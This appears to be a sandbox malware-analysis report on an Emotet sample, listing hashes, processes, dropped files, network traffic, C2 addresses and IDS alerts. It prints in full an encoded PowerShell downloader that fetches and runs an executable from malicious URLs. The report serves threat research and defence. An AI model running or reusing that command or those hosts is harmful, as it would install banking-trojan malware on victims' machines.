File name: | bb85b03988919be948cc497513c1d7886b45f1df.zip |
Full analysis: | https://app.any.run/tasks/8976797e-8d42-4c00-a918-3bfea477a8f7 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 19, 2019, 10:57:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | C138FDEE080EC4CB9ED3B679B85EA603 |
SHA1: | F65416D27827B937469C820A799EDAC867BE69ED |
SHA256: | 3750B21CF80C45821960924AA9452A7169EE06347C5C96D0762F08D797929F45 |
SSDEEP: | 3072:/KWGARYsWV7KNNx+lkyx1Pga64oIdRVTqTWAK6RXC//Kixyv:iWGARYsWNKMV7Pgxodd3av |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:19 12:16:02 |
ZipCRC: | 0x66b4c6a7 |
ZipCompressedSize: | 147298 |
ZipUncompressedSize: | 254043 |
ZipFileName: | bb85b03988919be948cc497513c1d7886b45f1df |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3624 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\bb85b03988919be948cc497513c1d7886b45f1df.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3540 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\doc.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3632 | powershell -encod JABSAE0AbwBqAGYAWABFAFUAPQAnAGgAdwBpAF8ATgAyAFIAQgAnADsAJABDAFkAWQBmADIAUgBRADkAIAA9ACAAJwAyADAAOAAnADsAJABXAGkAaABMAFgATwBsAD0AJwBZAHIAZABVAHEAWQBSACcAOwAkAHYAUwBfADAAUwBCAGIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAWQBZAGYAMgBSAFEAOQArACcALgBlAHgAZQAnADsAJABmAE8AcgBOAHcARQBSAD0AJwBPAF8AXwBPAHYAWABIACcAOwAkAE0AagBfAHoAdwBqAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBCAEMATABpAEUAbgB0ADsAJAB2AG0AMwBQAFAATwA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAZQBmAG8AcgB0AHUAbgBhAHQAZQBuAHUAdAByAGkAdABpAG8AbgAuAGMAbwBtAC8AdgB1AHoAcAA0AG8AMgB2AGIALwBoADMALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHIAYQBuAGcAcgBlAGEAbABpAHQAeQAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwB2ADcAcgByADcALwBAAGgAdAB0AHAAcwA6AC8ALwBjAG8AZABlAG4AcABpAGMALgBjAG8AbQAvAHcAYQBuAGQAZQByAHYAbwBnAGUAbAAvADcAMABtAGoAYQA0AC8AQABoAHQAdABwADoALwAvAHAAaQBuAG0AbwB2AGEALgB4AHkAegAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB3AGkAZABzAHIAYQBxADQANgA4ADUALwBAAGgAdAB0AHAAcwA6AC8ALwBlAGMAYQBtAHAAdQBzAGsAYgBkAHMALgBjAG8AbQAvAHYAbgBnAHAALwB2ADQAMAA1AC8AJwAuACIAUwBgAHAAbABpAFQAIgAoACcAQAAnACkAOwAkAEYAVQBIAEkAZABtAGkAPQAnAFAASwBVADEAawBmAGgAbAAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBqADgAdABwAGkAQgAgAGkAbgAgACQAdgBtADMAUABQAE8AKQB7AHQAcgB5AHsAJABNAGoAXwB6AHcAagAuACIARABPAHcATgBsAGAAbwBBAGQARgBJAGAAbABlACIAKAAkAEUAagA4AHQAcABpAEIALAAgACQAdgBTAF8AMABTAEIAYgApADsAJABMAHcAYwA1AGQAMgBUAHMAPQAnAHcARgBNAHcAdQBLACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAdgBTAF8AMABTAEIAYgApAC4AIgBsAEUAYABOAEcAVABIACIAIAAtAGcAZQAgADIAOAA5ADQANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAVAAiACgAJAB2AFMAXwAwAFMAQgBiACkAOwAkAG0ARgBwAFQASABfAHUAPQAnAFYAZgByAEsAMABPAHEAJwA7AGIAcgBlAGEAawA7ACQAVwBwAFMASwA1ADQATwA9ACcAegBqAEcAYQBEAEsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcABqAGMAVQA2AHUAdwA9ACcASQBpAHcASAAwAEYAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3744 | "C:\Users\admin\208.exe" | C:\Users\admin\208.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2964 | "C:\Users\admin\208.exe" | C:\Users\admin\208.exe | — | 208.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2916 | --7522c4b8 | C:\Users\admin\208.exe | — | 208.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3960 | --7522c4b8 | C:\Users\admin\208.exe | 208.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3404 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 208.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2428 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2288 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE9A9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44490125.wmf | wmf | |
MD5:006F534416745DB0CE87B9BA927FB178 | SHA256:5F9BEBBFE21CF6221FB7AD0F5FE59BAE2875201CCCF6E6F4C85B57BD933E36F3 | |||
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56E951BF.wmf | wmf | |
MD5:9CD4F92AF225D2D585646598F5B2C881 | SHA256:5B60314B658BE5222A1CD3BC5D9E9F0D79AD6D78BC1AEA5B1D67885583DB7302 | |||
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B79D641.wmf | wmf | |
MD5:5F8BB68F7F6DDB4A55676F5A705F61B5 | SHA256:44FE781EA3153136C5F5D68B1F8EF400FDE9CEC2D6E0E0BDD37A626BDB852684 | |||
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3ABDB3C9.wmf | wmf | |
MD5:CE6D2F19594887E6A3216F3EA6F19157 | SHA256:FC3270CF801462ED384FE1527FE4C317E406602F7AC7366CFA67799ABCDC406E | |||
3540 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:F57C4E9ED3B29A11DEF3DFEA2071FA53 | SHA256:711DDFB9C7512A241E617A6215B6F991220F69479B45474980594928BDC938B6 | |||
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3CC737B.wmf | wmf | |
MD5:C910D547CDB12F4185FD93C214BFCF60 | SHA256:939C550745B57E4920C6349AD42E505A7BBAE9A715627523D3710884055DAE43 | |||
3624 | WinRAR.exe | C:\Users\admin\Desktop\bb85b03988919be948cc497513c1d7886b45f1df | document | |
MD5:150FCC6064AECC31913DFE80A990328E | SHA256:56CF659855F58AB02A78CA618FED56938BB06AB1DB3113DDD9C62F14F697308F | |||
3540 | WINWORD.EXE | C:\Users\admin\Desktop\~$doc.doc | pgc | |
MD5:3A733DBA8B0783B9F161ED359CAB5A6B | SHA256:1816C872B001D7D9FB498DF6C6C6EB2310D62064A2F46C1B0CBB741EA402B14B | |||
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C1240B4.wmf | wmf | |
MD5:FC521AADAE1AC4219FB7E8413BCEF803 | SHA256:32D85520DC128E382B3F6098C8FACFAABE5247C257BAD104D7369B5B8C9323C6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3632 | powershell.exe | GET | 200 | 45.76.184.98:80 | http://thefortunatenutrition.com/vuzp4o2vb/h3/ | SG | executable | 376 Kb | malicious |
3300 | easywindow.exe | POST | 200 | 187.149.84.80:8080 | http://187.149.84.80:8080/iplk/ | MX | binary | 132 b | malicious |
3300 | easywindow.exe | POST | — | 189.166.68.89:443 | http://189.166.68.89:443/ringin/ | MX | — | — | malicious |
3300 | easywindow.exe | POST | — | 114.79.134.129:443 | http://114.79.134.129:443/taskbar/chunk/ | IN | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3632 | powershell.exe | 45.76.184.98:80 | thefortunatenutrition.com | Choopa, LLC | SG | suspicious |
3300 | easywindow.exe | 114.79.134.129:443 | — | D-Vois Broadband Pvt Ltd | IN | malicious |
3300 | easywindow.exe | 189.166.68.89:443 | — | Uninet S.A. de C.V. | MX | malicious |
— | — | 187.149.84.80:8080 | — | Uninet S.A. de C.V. | MX | malicious |
Domain | IP | Reputation |
---|---|---|
thefortunatenutrition.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3632 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3632 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3632 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3300 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3300 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3300 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3300 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |